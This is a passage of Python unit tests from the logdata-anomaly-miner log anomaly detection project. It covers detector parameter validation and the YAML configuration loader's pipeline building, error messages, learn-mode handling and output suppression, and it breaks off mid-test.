constraint_list=[]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=None) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, 
VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, VariableTypeDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list="") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["file:///tmp/syslog"]) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/__init__.py000066400000000000000000000000001500476301700257020ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/000077500000000000000000000000001500476301700226715ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/YamlConfigTest.py000066400000000000000000001560631500476301700261460ustar00rootroot00000000000000import unittest import importlib import yaml import sys import re import aminer.AminerConfig as AminerConfig from datetime import datetime from aminer.AnalysisChild import AnalysisContext from aminer.analysis.AtomFilters import SubhandlerFilter from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector 
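from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector
from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector
from aminer.analysis.HistogramAnalysis import HistogramAnalysis, PathDependentHistogramAnalysis
from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector
from aminer.analysis.MatchFilter import MatchFilter
from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector
from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter
from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector
from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector
from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector
from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler
from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler
from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler
from aminer.events.JsonConverterHandler import JsonConverterHandler
from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory
from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.ParserMatch import ParserMatch
from aminer.input.LogAtom import LogAtom
from time import time
from unit.TestBase import TestBase


class YamlConfigTest(TestBase):
    """Unittests for the YamlConfig.

    Every test executes a fresh copy of ``aminer/YamlConfig.py`` from the installed aminer tree
    (``yaml_config_path``) and feeds it a fixture from ``unit/data/configfiles`` (a path resolved
    relative to the working directory), optionally building an ``AnalysisContext`` from the result.
    """

    # sys.path as it was when this class body ran; tearDown puts it back.
    sysp = sys.path
    resource_name = b"testresource"
    # Installed location of the module under test.
    yaml_config_path = '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py'

    def setUp(self):
        """Drop the first sys.path entry and append the aminer install and enabled-config directories."""
        TestBase.setUp(self)
        sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled']

    def tearDown(self):
        """Restore the sys.path captured at class definition time."""
        TestBase.tearDown(self)
        sys.path = self.sysp

    # ---- helpers -----------------------------------------------------------------------------

    def _yaml_config_module(self):
        """Return a freshly executed copy of the YamlConfig module.

        A new module object is created on every call, so the ``yaml_data`` that one test's
        ``load_yaml`` populates (and later edits) cannot leak into the next test.
        """
        # A bare ``import importlib`` does not guarantee that the ``importlib.util`` submodule is
        # bound, so import it explicitly where it is used.
        import importlib.util
        spec = importlib.util.spec_from_file_location('aminer_config', self.yaml_config_path)
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        return aminer_config

    def _load_config(self, config_file):
        """Return a fresh YamlConfig module with ``config_file`` loaded into it."""
        aminer_config = self._yaml_config_module()
        aminer_config.load_yaml(config_file)
        return aminer_config

    def _rebuild_pipeline(self, aminer_config):
        """Build a new AnalysisContext from an already loaded (possibly edited) config module."""
        context = AnalysisContext(aminer_config)
        context.build_analysis_pipeline()
        return context

    def _build_pipeline(self, config_file):
        """Load ``config_file`` and build its analysis pipeline; return ``(aminer_config, context)``."""
        aminer_config = self._load_config(config_file)
        return aminer_config, self._rebuild_pipeline(aminer_config)

    def _assert_load_fails(self, config_file, expected_message):
        """Assert that loading ``config_file`` raises a ValueError whose text is exactly ``expected_message``."""
        aminer_config = self._yaml_config_module()
        with self.assertRaises(ValueError) as raised:
            aminer_config.load_yaml(config_file)
        self.assertEqual(expected_message, str(raised.exception))

    def _assert_basic_pipeline(self, context, timestamp_paths):
        """Check the component layout shared by the learn-mode and multi-source fixtures."""
        self.assertIsInstance(context.registered_components[0][0], SubhandlerFilter)
        self.assertIsInstance(context.registered_components[1][0], NewMatchPathDetector)
        self.assertIsInstance(context.registered_components[2][0], NewMatchPathValueDetector)
        self.assertIsInstance(context.registered_components[3][0], NewMatchPathValueComboDetector)
        self.assertIsInstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)
        self.assertEqual(context.atomizer_factory.default_timestamp_path_list, timestamp_paths)
        self.assertIsInstance(context.atomizer_factory.parsing_model, SequenceModelElement)
        self.assertIsInstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)

    def _assert_learn_mode_everywhere(self, context, expected):
        """Assert that every registered component exposing ``learn_mode`` has the truthiness ``expected``."""
        for key in context.registered_components:
            component = context.registered_components[key][0]
            if hasattr(component, 'learn_mode'):
                self.assertEqual(bool(component.learn_mode), expected, 'learn_mode of %s' % type(component).__name__)

    # ---- tests -------------------------------------------------------------------------------

    def test1_load_generic_yaml_file(self):
        """Load a valid yaml file and check that it ends up in ``aminer_config.yaml_data``."""
        aminer_config = self._load_config('unit/data/configfiles/template_config.yml')
        self.assertIsNotNone(aminer_config.yaml_data)

    def test2_load_nonexistent_yaml_file(self):
        """Loading a nonexistent yaml file must raise FileNotFoundError."""
        aminer_config = self._yaml_config_module()
        with self.assertRaises(FileNotFoundError):
            aminer_config.load_yaml('unit/data/configfiles/doesnotexist.yml')

    def test3_load_invalid_yaml_file(self):
        """A file with invalid yaml syntax must be rejected with a yaml.YAMLError.

        NOTE(review): this only shows that malformed YAML is rejected. Whether ``load_yaml`` parses with
        ``yaml.safe_load`` (so that a config file cannot instantiate arbitrary Python objects through YAML
        tags) is not covered here - confirm in YamlConfig.py.
        """
        aminer_config = self._yaml_config_module()
        with self.assertRaises(yaml.YAMLError):
            aminer_config.load_yaml('unit/data/configfiles/invalid_config.yml')

    def test4_load_yaml_file_with_invalid_schema(self):
        """A yaml file that violates the config schema must be rejected with a ValueError."""
        aminer_config = self._yaml_config_module()
        with self.assertRaises(ValueError):
            aminer_config.load_yaml('unit/data/configfiles/invalid_schema.yml')

    def test5_analysis_pipeline_working_config(self):
        """Build a pipeline from a valid yaml file and verify every registered component, handler and parser element."""
        _, context = self._build_pipeline('unit/data/configfiles/multiple_components.yml')
        expected_components = [
            SubhandlerFilter, TimestampsUnsortedDetector, NewMatchPathValueDetector, NewMatchPathValueComboDetector,
            HistogramAnalysis, PathDependentHistogramAnalysis, EnhancedNewMatchPathValueComboDetector, MatchFilter,
            MatchValueAverageChangeDetector, MatchValueStreamWriter, NewMatchPathDetector,
            TimeCorrelationViolationDetector, AllowlistViolationDetector]
        for index, component_class in enumerate(expected_components):
            self.assertIsInstance(context.registered_components[index][0], component_class, 'registered component %d' % index)
        expected_handlers = [StreamPrinterEventHandler, SyslogWriterEventHandler, DefaultMailNotificationEventHandler]
        for index, handler_class in enumerate(expected_handlers):
            self.assertIsInstance(context.atomizer_factory.event_handler_list[index], handler_class, 'event handler %d' % index)
        self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time'])
        parsing_model = context.atomizer_factory.parsing_model
        self.assertIsInstance(parsing_model, SequenceModelElement)
        self.assertEqual(parsing_model.element_id, 'accesslog')
        # (class, element_id, fixed_data) per child of the access-log sequence; None means "not checked".
        expected_children = [
            (VariableByteDataModelElement, None, None),
            (FixedDataModelElement, 'sp0', b' '),
            (VariableByteDataModelElement, None, None),
            (FixedDataModelElement, 'sp1', b' '),
            (VariableByteDataModelElement, None, None),
            (FixedDataModelElement, 'sp2', b' '),
            (DateTimeModelElement, None, None),
            (FixedDataModelElement, 'sq3', b' "'),
            (FixedWordlistDataModelElement, None, None),
            (FixedDataModelElement, 'sp3', b' '),
            (VariableByteDataModelElement, None, None),
            (FixedDataModelElement, 'http1', b' HTTP/'),
            (VariableByteDataModelElement, None, None),
            (FixedDataModelElement, 'sq4', b'" '),
            (DecimalIntegerValueModelElement, None, None),
            (FixedDataModelElement, 'sp4', b' '),
            (DecimalIntegerValueModelElement, None, None),
            (FixedDataModelElement, 'sq5', b' "-" "'),
            (VariableByteDataModelElement, None, None),
            (FixedDataModelElement, None, None),
        ]
        for index, (element_class, element_id, fixed_data) in enumerate(expected_children):
            child = parsing_model.children[index]
            self.assertIsInstance(child, element_class, 'parser child %d' % index)
            if element_id is not None:
                self.assertEqual(child.element_id, element_id, 'parser child %d' % index)
                self.assertEqual(child.fixed_data, fixed_data, 'parser child %d' % index)

    def test6_analysis_fail_without_parser_start(self):
        """The config must be rejected when no parser model carries the start tag."""
        aminer_config = self._yaml_config_module()
        with self.assertRaises(ValueError):
            aminer_config.load_yaml('unit/data/configfiles/missing_parserstart_config.yml')

    def test7_analysis_fail_with_double_parser_start(self):
        """The config must be rejected when more than one parser model carries the start tag."""
        aminer_config = self._yaml_config_module()
        with self.assertRaises(ValueError):
            aminer_config.load_yaml('unit/data/configfiles/double_parserstart_config.yml')

    def test8_analysis_fail_with_unknown_parser_start(self):
        """An unknown parser ``type`` must be rejected by the schema validator with the exact error text.

        The expected message shows that the schema resolves ``type`` by importing a module of that name,
        i.e. the config file decides which modules get imported; an unknown type surfaces as an import failure.
        """
        self._assert_load_fails(
            'unit/data/configfiles/unknown_parser_config.yml',
            "{'Parser': [{0: [{'type': [\"field 'type' cannot be coerced: No module named 'UnknownModel'\"]}]}]}")

    def test9_analysis_pipeline_working_config_without_analysis_components(self):
        """The config must load with an empty ``Analysis`` section and with the section removed entirely.

        The resulting pipelines are checked by ``run_empty_components_tests``.
        """
        aminer_config, context = self._build_pipeline('unit/data/configfiles/multiple_components_null_analysis_components.yml')
        self.run_empty_components_tests(context)
        del aminer_config.yaml_data['Analysis']
        self.run_empty_components_tests(self._rebuild_pipeline(aminer_config))

    def test10_analysis_fail_with_unknown_analysis_component(self):
        """An unknown analysis component must be rejected by the schema validator with the exact error text."""
        self._assert_load_fails(
            'unit/data/configfiles/unknown_analysis_component.yml',
            "Config-Error: {'Analysis': [{2: ['none or more than one rule validate', {'Analysis error': 'unallowed value"
            " UnknownDetector'}]}]}")

    def test11_analysis_fail_with_unknown_event_handler(self):
        """An unknown event handler ``type`` must be rejected by the schema validator with the exact error text.

        As for parsers, the message shows the handler type is resolved by importing a module of that name.
        """
        self._assert_load_fails(
            'unit/data/configfiles/unknown_event_handler.yml',
            "{'EventHandlers': [{0: [{'type': [\"field 'type' cannot be coerced: No module named "
            "'aminer.events.UnknownPrinterEventHandler'\"]}]}]}")

    def test12_analysis_pipeline_working_config_without_event_handler_components(self):
        """The config must load with an empty ``EventHandlers`` section and with the section removed entirely.

        ``run_empty_components_tests`` also covers that the StreamPrinterEventHandler is used by default.
        """
        aminer_config, context = self._build_pipeline('unit/data/configfiles/multiple_components_null_event_handlers.yml')
        self.run_empty_components_tests(context)
        del aminer_config.yaml_data['EventHandlers']
        self.run_empty_components_tests(self._rebuild_pipeline(aminer_config))

    def test13_analysis_pipeline_working_with_json(self):
        """A JsonConverterHandler configured in yaml must wrap the StreamPrinterEventHandler."""
        _, context = self._build_pipeline('unit/data/configfiles/json_config.yml')
        self.assertIsInstance(context.registered_components[0][0], SubhandlerFilter)
        self.assertIsInstance(context.registered_components[1][0], NewMatchPathDetector)
        json_handler = context.atomizer_factory.event_handler_list[0]
        self.assertIsInstance(json_handler, JsonConverterHandler)
        self.assertIsInstance(json_handler.json_event_handlers[0], StreamPrinterEventHandler)
        self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time'])
        self.assertIsInstance(context.atomizer_factory.parsing_model, SequenceModelElement)
        self.assertIsInstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)

    def test14_analysis_pipeline_working_with_learnMode(self):
        """Per-component ``learn_mode`` wins over the global ``LearnMode``; without either the build must fail."""
        aminer_config, context = self._build_pipeline('unit/data/configfiles/learnMode_config.yml')
        self._assert_basic_pipeline(context, ['/accesslog/time'])
        # Component-specific learn_mode arguments must be preferred over the global setting.
        self.assertTrue(context.registered_components[1][0].learn_mode)
        self.assertTrue(context.registered_components[2][0].learn_mode)
        self.assertFalse(context.registered_components[3][0].learn_mode)
        # Without per-component learn_mode the global LearnMode of the fixture applies to every
        # component (the fixture's global value is expected to be True here).
        for component in aminer_config.yaml_data['Analysis']:
            del component['learn_mode']
        self._assert_learn_mode_everywhere(self._rebuild_pipeline(aminer_config), True)
        # Flip the global LearnMode to False: every component must follow.
        aminer_config.yaml_data['LearnMode'] = False
        self._assert_learn_mode_everywhere(self._rebuild_pipeline(aminer_config), False)
        # With neither a global nor a per-component setting, building the pipeline must raise.
        del aminer_config.yaml_data['LearnMode']
        context = AnalysisContext(aminer_config)
        self.assertRaises(ValueError, context.build_analysis_pipeline)

    def test15_analysis_pipeline_working_with_input_parameters(self):
        """``Input.multi_source`` selects SimpleMultisourceAtomSync (True) or SubhandlerFilter (False) as first atom handler."""
        aminer_config, context = self._build_pipeline('unit/data/configfiles/multiSource_config.yml')
        self._assert_basic_pipeline(context, ['/model/accesslog/time'])
        # multi_source True (as in the fixture): SimpleByteStreamLineAtomizerFactory with a SimpleMultisourceAtomSync.
        self.assertIsInstance(context.atomizer_factory, SimpleByteStreamLineAtomizerFactory)
        self.assertIsInstance(context.atomizer_factory.atom_handler_list[0], SimpleMultisourceAtomSync)
        self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [aminer_config.yaml_data['Input']['timestamp_paths']])
        # multi_source False: SimpleByteStreamLineAtomizerFactory with a SubhandlerFilter.
        aminer_config.yaml_data['Input']['multi_source'] = False
        context = self._rebuild_pipeline(aminer_config)
        self.assertIsInstance(context.atomizer_factory, SimpleByteStreamLineAtomizerFactory)
        self.assertIsInstance(context.atomizer_factory.atom_handler_list[0], SubhandlerFilter)
        self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [aminer_config.yaml_data['Input']['timestamp_paths']])

    def test16_parsermodeltype_parameter_for_another_parsermodel_type(self):
        """This test checks if all ModelElements with child elements are working properly."""
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml')
        context = AnalysisContext(aminer_config)
        context.build_analysis_pipeline()
        self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter))
        self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector))
        self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector))
        self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector))
        self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler))
        self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/model/accesslog/time'])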
self.assertTrue(isinstance(context.atomizer_factory.parsing_model, FirstMatchModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0].children[0], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0].children[1], RepeatedElementDataModelElement)) self.assertTrue(isinstance( context.atomizer_factory.parsing_model.children[0].children[1].repeated_element, OptionalMatchModelElement)) self.assertTrue(isinstance( context.atomizer_factory.parsing_model.children[0].children[1].repeated_element.optional_element, FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[1], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2], ElementValueBranchModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2].value_model, FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2].branch_model_dict['host'], FixedDataModelElement)) # change OptionalModelElement to unknown_model aminer_config.yaml_data['Parser'][1]['args'] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change RepeatedElementDataModelElement to unknown_model aminer_config.yaml_data['Parser'][2]['args'][0] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change SequenceModelElement to unknown_model aminer_config.yaml_data['Parser'][3]['args'][1] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, 
context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change ElementValueBranchModelElement to unknown_model aminer_config.yaml_data['Parser'][4]['args'][0] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') aminer_config.yaml_data['Parser'][4]['branch_model_dict'][0]['model'] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change FirstMatchModelElement to unknown_model aminer_config.yaml_data['Parser'][5]['args'][1] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') def test17_demo_yaml_config_equals_python_config(self): """This test checks if the yaml demo config is the same as the python version.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('demo/aminer/demo-config.yml') yml_context = AnalysisContext(aminer_config) yml_context.build_analysis_pipeline() aminer_config = AminerConfig.load_config('demo/aminer/demo-config.py') py_context = AnalysisContext(aminer_config) py_context.build_analysis_pipeline() import copy yml_config_properties = copy.deepcopy(yml_context.aminer_config.config_properties) del yml_config_properties['Parser'] del yml_config_properties['Input'] del yml_config_properties['Analysis'] del yml_config_properties['EventHandlers'] del yml_config_properties['LearnMode'] del yml_config_properties['LogLineIdentifier'] del 
yml_config_properties['LogResourceList'][0]['json'] del yml_config_properties['LogResourceList'][0]['xml'] # remove SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler and NewMatchPathDetector as they are added by the YamlConfig. py_registered_components = copy.copy(py_context.registered_components) del py_registered_components[0] del py_registered_components[1] del py_registered_components[2] del py_registered_components[10] yml_registered_components = copy.copy(yml_context.registered_components) del yml_registered_components[0] del yml_registered_components[1] tmp = {} keys = list(py_registered_components.keys()) for i in range(1, len(py_registered_components)+1): tmp[i] = py_registered_components[keys[i-1]] py_registered_components = tmp py_registered_components_by_name = copy.copy(py_context.registered_components_by_name) del py_registered_components_by_name['SimpleUnparsedHandler'] del py_registered_components_by_name['VerboseUnparsedHandler'] del py_registered_components_by_name['NewMatchPath'] del py_registered_components_by_name['SimpleMonotonicTimestampAdjust'] yml_registered_components_by_name = copy.copy(yml_context.registered_components_by_name) del yml_registered_components_by_name['DefaultNewMatchPathDetector'] del yml_registered_components_by_name['AtomFilter'] self.assertEqual(yml_config_properties, py_context.aminer_config.config_properties) # there actually is no easy way to compare aminer components as they do not implement the __eq__ method. 
self.assertEqual(len(yml_registered_components), len(py_registered_components)) for i in range(2, len(yml_registered_components)): self.assertEqual(type(yml_registered_components[i]), type(py_registered_components[i])) self.assertEqual(yml_registered_components_by_name.keys(), py_registered_components_by_name.keys()) for name in yml_registered_components_by_name.keys(): self.assertEqual(type(yml_registered_components_by_name[name]), type(py_registered_components_by_name[name])) self.assertEqual(len(yml_context.real_time_triggered_components), len(py_context.real_time_triggered_components)) # the atom_handler_list is not equal as the python version uses a SimpleMonotonicTimestampAdjust. self.assertEqual(yml_context.atomizer_factory.default_timestamp_path_list, py_context.atomizer_factory.default_timestamp_path_list) self.assertEqual(type(yml_context.atomizer_factory.event_handler_list), type(py_context.atomizer_factory.event_handler_list)) def test18_etd_order(self): """Loads the template_config and checks if the position of the ETD was changed as expected.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/template_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertEqual(context.aminer_config.yaml_data['Analysis'][0]['type'].name, 'EventTypeDetector') self.assertEqual(context.aminer_config.yaml_data['Analysis'][1]['type'].name, 'NewMatchPathValueDetector') self.assertEqual(context.aminer_config.yaml_data['Analysis'][2]['type'].name, 'NewMatchPathValueComboDetector') self.assertEqual(context.aminer_config.yaml_data['Analysis'][3]['type'].name, 'NewMatchPathValueComboDetector') def test19_stream_printer_output_file(self): """Check if the output_file_path property of StreamPrinterEventHandler works properly.""" 
spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/template_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertEqual(context.atomizer_factory.event_handler_list[0].stream.name, '/tmp/streamPrinter.txt') self.assertEqual(context.atomizer_factory.event_handler_list[0].stream.mode, 'w+') def test20_suppress_output(self): """ Check if the suppress property and SuppressNewMatchPathDetector are working as expected. This test only includes the StreamPrinterEventHandler. """ __expected_string1 = '%s New path(s) detected\n%s: "%s" (%d lines)\n %s\n\n' t = time() fixed_dme = FixedDataModelElement('s1', b' pid=') match_context_fixed_dme = MatchContext(b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("", match_context_fixed_dme) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, self) datetime_format_string = '%Y-%m-%d %H:%M:%S' match_path_s1 = "['/s1']" __expected_string2 = '%s New value combination(s) detected\n%s: "%s" (%d lines)\n%s\n\n' fixed_dme2 = FixedDataModelElement('s1', b'25537 uid=') decimal_integer_value_me = DecimalIntegerValueModelElement( 'd1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context_sequence_me = MatchContext(b'25537 uid=2') seq = SequenceModelElement('seq', [fixed_dme2, decimal_integer_value_me]) match_element_sequence_me = seq.get_match_element('first', match_context_sequence_me) string2 = " (b'25537 uid=', 2)" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) 
aminer_config.load_yaml('unit/data/configfiles/suppress_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() context.aminer_config.yaml_data['Analysis'][2]['suppress'] = False context.atomizer_factory.event_handler_list[0].stream = self.output_stream default_nmpd = context.registered_components[3][0] default_nmpd.output_logline = False self.assertTrue(default_nmpd.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), __expected_string1 % ( datetime.fromtimestamp(t).strftime(datetime_format_string), default_nmpd.__class__.__name__, 'DefaultNewMatchPathDetector', 1, match_path_s1)) self.reset_output_stream() context.aminer_config.yaml_data['Analysis'][2]['suppress'] = True context = AnalysisContext(aminer_config) context.build_analysis_pipeline() context.atomizer_factory.event_handler_list[0].stream = self.output_stream default_nmpd = context.registered_components[3][0] default_nmpd.output_logline = False self.assertTrue(default_nmpd.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() value_combo_det = context.registered_components[1][0] log_atom_sequence_me = LogAtom(match_element_sequence_me.get_match_string(), ParserMatch(match_element_sequence_me), t, self) context.atomizer_factory.event_handler_list[0].stream = self.output_stream self.assertTrue(value_combo_det.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), __expected_string2 % ( datetime.fromtimestamp(t).strftime(datetime_format_string), value_combo_det.__class__.__name__, 'ValueComboDetector', 1, string2)) self.reset_output_stream() context.aminer_config.yaml_data['Analysis'][0]['suppress'] = True context = AnalysisContext(aminer_config) context.build_analysis_pipeline() 